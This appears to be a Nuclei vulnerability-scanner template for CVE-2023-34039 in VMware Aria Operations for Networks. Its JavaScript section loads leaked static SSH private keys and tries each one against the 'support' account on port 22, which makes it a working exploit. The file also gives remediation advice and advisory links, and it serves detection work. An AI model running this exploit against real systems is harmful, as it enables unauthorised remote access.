id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor (see VMSA-2023-0018) to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.9013
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,cve2023,vmware,aria,rce,fuzz,vrealize

variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # the init field can be used to make any preparations before the actual exploit runs;
  # here it reads all private keys from the helpers folder and stores them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)

    # check that the port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)

    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful

    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"

    payloads:
      # 'keys' is replaced by the actual private keys after init has executed
      keys:
        - dummy1
        - dummy2

    threads: 10
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 4a0a0047304502202b98e75ed8b7179fce923039e93baf0da9359ae4bd9edd5f205768ed70bbdd2d022100fdd378ca41e7a2cb85cf3c74f02fc2418502e6aac28860f13d8a20aaa60ce903:922c64590222798bb761d5b6d8e72950